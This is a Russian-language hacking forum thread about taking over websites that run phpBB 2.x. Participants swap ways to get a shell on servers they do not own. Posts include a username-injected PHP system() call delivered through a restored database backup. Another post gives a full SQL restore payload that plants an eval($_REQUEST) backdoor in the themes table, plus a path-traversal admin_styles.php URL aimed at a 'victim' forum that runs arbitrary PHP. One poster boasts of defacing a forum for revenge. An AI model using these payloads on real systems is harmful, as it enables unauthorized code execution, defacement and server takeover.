![]() |
Захват сайта через phpBB
Захват сайта через phpBB. Есть предложения? Речь не идет о случайном совпадении пароля, от форума к FTP.
|
а тебе пароли от ФТП ничего не дадут.. я имею ввиду через ФТП ничего не намутишь =)) можно попробывать на сходимотьпасов и логина от БД.... но это разные стопудня пароли будут...
блин... а вот я тож на самом деле этим вопросом мучаюсь... Если тока попробывать залить шел на сайт... |
Я про шелл и говорю, вопрос как его запендюрить
|
На секьюритилаб есть модифицированый сплоит испльзующий дыру с куками и сразу дающий шелл! Я сам не проверял так как админы которым мне надо отомстить закрыли форум вообще после того как я там оставил графити ;) Жаль на тот момент не было того сплоита :( Теперь приходиться вывдумывать чето более серъезное.
|
вопрос все еще актуален, для меня!
|
ну а шелл залить..потом прибиндить порт и пробовать локальные сплойты..не так? =)
|
Е! НЕЛЬЗЯ! - Сказал бы Я месяц назад. теперь можно. купите новый Xakep (не реклама) и там будет мое видео))
|
видео про что?про захват сайта через пхпбб? =)
|
мля... рассказываю... дампишь базу (резервная копия) У себя на компе изменяешь ник юзера или другое значение таблицы phpbb_users (как вариант адрес аватары) на вот такой код <?system("echo lol > lol");?>... И обратно заливаешь на форум (Восстановление форума)... Потом ишешь того юзера и заходишь к нему в профиль.... Шелл обработается и выполнится команада ... вот тебе и шелл... че мучится со всякими сплоитами... бред.....
|
Неправильно. Все делается через темплейты... Смотри исходник сплойта.
Там все хитрее. |
у меня работает... если не веришь попробуй сам...
Ps при юзаньи функции "селект" никаких тегов не фильтруется.... поэтому можно вставлять свой код |
про хакер - это реклама =)) к тому же он еще не вышел...
|
Да! я знаю как это сделать!!!
Тока вот чтобы скомпилить експлоит мне нужен файл заголовка с++ serv.h =((( Вот. мож кто подскажет где его взять? тада захват сайта реален. |
phpBB
Цитата:
|
серв.н
Цитата:
|
идиотизм
|
блин. сами вы идиоты!!! Посмотрю я как ты сломаешь пхпББ 2,0,13 при помощи скомпиленного того сплоита. млять, я вам говорю про выполнение пхп через пхпББ 2.0.13!!! Не хотите - не надо сам буду юзать. лохи,блин... умники.
|
ну так кто - нибудь знает, где взять serv.h?
|
Цитата:
|
Я изменил ник юзера на тот код, как мне теперь просмотреть файлы на серваке? ls это понятно. Я несовсем понял как теперь обратиться к тому коду... =\
|
Ну и?... Куда все сбежали то?
|
Ну и?... Куда все сбежали то? Может кто нормально объяснить? Любопытно ведь.
|
да это ересь. нифига неработает и работать не может по определению =0
|
кто тут орет что я придурок?
ты сам посмотри что пишешь? serv.h это инкл. файл никсов )) |
все работает если есть прямые руки
|
ты смотри, что другие пишут. я тя придурком не называл... а файл уж сам нашел... =)
|
Цитата:
|
Это не просто неправда, а ересь...
а вот действенный метод: заходишь под админом (это если админский доступ есль, а иначе - не получится) Затем идешь в восстановление базы, и восстанавливаешь из такого файла: DROP TABLE IF EXISTS phpbb_themes; CREATE TABLE phpbb_themes ( themes_id mediumint(8) unsigned NOT NULL auto_increment, template_name varchar(30) NOT NULL, style_name varchar(30) NOT NULL, head_stylesheet varchar(100), body_background varchar(100), body_bgcolor varchar(6), body_text varchar(6), body_link varchar(6), body_vlink varchar(6), body_alink varchar(6), body_hlink varchar(6), tr_color1 varchar(6), tr_color2 varchar(6), tr_color3 varchar(6), tr_class1 varchar(25), tr_class2 varchar(25), tr_class3 varchar(25), th_color1 varchar(6), th_color2 varchar(6), th_color3 varchar(6), th_class1 varchar(25), th_class2 varchar(25), th_class3 varchar(25), td_color1 varchar(6), td_color2 varchar(6), td_color3 varchar(6), td_class1 varchar(25), td_class2 varchar(25), td_class3 varchar(25), fontface1 varchar(50), fontface2 varchar(50), fontface3 varchar(50), fontsize1 tinyint(4), fontsize2 tinyint(4), fontsize3 tinyint(4), fontcolor1 varchar(6), fontcolor2 varchar(6), fontcolor3 varchar(6), span_class1 varchar(25), span_class2 varchar(25), span_class3 varchar(25), img_size_poll smallint(5) unsigned, img_size_privmsg smallint(5) unsigned, PRIMARY KEY (themes_id) ); INSERT INTO phpbb_themes (themes_id, template_name, style_name,head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2,fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3,span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg) VALUES('1', 'subSilver', 'subSilver', 'subSilver.css','', 'E5E5E5','000000','006699', '5493B4', '', 'DD6900', 'EFEFEF', 'DEE3E7', 'D1D7DC', '','', '', '98AAB1', '006699', 'FFFFFF', 'cellpic1.gif', 'cellpic3.gif','cellpic2.jpg', 'FAFAFA', 'FFFFFF', '', 'row1', 'row2', '', 'Verdana,Arial, Helvetica, sans-serif', 'Trebuchet MS', 'Courier, \'Courier New\',sans-serif', '10', '11', '12', '444444', '006600', 'FFA34F', '','', '', NULL, NULL); UPDATE phpbb_config set config_value="1" where config_name="default_style"; INSERT INTO phpbb2_themes (themes_id, template_name, style_name,head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink,body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2,tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3,td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1,fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2,fontcolor3, span_class1, span_class2, span_class3, img_size_poll, img_size_privmsg)VALUES('2', '"//template_name varchar(30) NOT NULL,aaa=12;eval(stripslashes($_REQUEST[coylisgod]));exit();// /../../../../../../../../../../../../../../../../../../../tmp', 'FI Black', 'fiblack.css', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', 'row1', 'row2', '', '', '', '', '0','0', '0', '', '006699', 'ffa34f', 'cc', 'bb', 'a', '0', '0'); Вот. потом идешь по адресу hтtp://forum.zhertva/admin/admin_styles.php?mode=addnew&install_to=../../../../../../../../../../../../../../../../../../../tmp&coylisgod=[ЗДЕСЬ ПХП-КОД]&sid=[ЗДЕСЬ СВОЮ СЕССИЮ] И твой пхп-код выполнится, далее делай, что хочешь... з.ы. работает только до 13-й версии з.з.ы. благодарностей не надо |
а за что благодарности?
|
Цитата:
|
А можно такую вещь сделать.Вот например есть там форум на phpBB 2.0.10 .К несчастью он пропатчен.Тоесть уязвимость в highlight не работает.Вдруг я получу права админа на форуме.Могу я с помощью восстановить БД или там чего либо,получить дыру в этом форуме.Чтоб снова бы работала уязвимость.
|
Это вопрос? если да, то вышеописанный способ действует на всех версиях до 2.0.13 включительно.
2 монстер даже отвечать ничего не хочется... головой думай. и ваще хватит флеймить. |
хмм... чё-то вы отошли от темы кажись...
а про то чтоб слить БД... слить можно, тока её переделать, чтоб была возможность бага непропатченоого форума.. сорри... но это ПОЛНЫЙ ЛОЛ !!!! баг с highlight как раз и берёт грубо говоря л:п из БД =)) её нужно нефигово проработать и переделать, чтоб было всё пучком |
| Время: 23:13 |